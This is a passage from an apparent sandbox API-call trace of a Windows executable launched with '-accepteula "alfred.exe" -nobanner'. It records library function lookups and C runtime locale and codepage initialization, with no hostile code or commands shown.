lpProcName="MultiByteToWideChar") returned 0x75142d60 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0217.992] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0217.993] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0217.994] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0217.995] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0217.996] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0217.996] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0218.047] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0218.047] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0218.047] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0218.047] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0218.047] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0218.048] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0218.048] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0218.048] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0218.048] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0218.048] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0218.048] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0218.048] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0218.048] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0218.048] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0218.048] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0218.048] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0218.048] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x749c1080 [0218.048] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0218.048] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0218.049] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0218.049] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0218.049] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0218.049] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0218.054] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0218.054] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0218.054] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0218.054] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x2f747edc, dwHighDateTime=0x1d45ac6)) [0218.054] GetCurrentThreadId () returned 0xe08 [0218.054] GetCurrentProcessId () returned 0xe34 [0218.054] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=26551709282) returned 1 [0218.055] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0218.055] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0218.056] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0218.057] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0218.057] GetCurrentThreadId () returned 0xe08 [0218.057] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x3aca0e, hStdError=0x475810)) [0218.057] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0218.057] GetFileType (hFile=0x38) returned 0x2 [0218.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0218.057] GetFileType (hFile=0xc0) returned 0x3 [0218.057] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0218.058] GetFileType (hFile=0x40) returned 0x2 [0218.058] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" [0218.058] GetEnvironmentStringsW () returned 0x5ebcc0* [0218.058] FreeEnvironmentStringsW (penv=0x5ebcc0) returned 1 [0218.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] GetACP () returned 0x4e4 [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] IsValidCodePage (CodePage=0x4e4) returned 1 [0218.060] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0218.060] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0218.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0218.060] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0218.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0218.060] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0218.060] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0218.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9e\xcb\x3a", lpUsedDefaultChar=0x0) returned 256 [0218.060] GetLastError () returned 0x0 [0218.060] SetLastError (dwErrCode=0x0) [0218.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0218.060] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0218.061] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0218.061] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0218.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 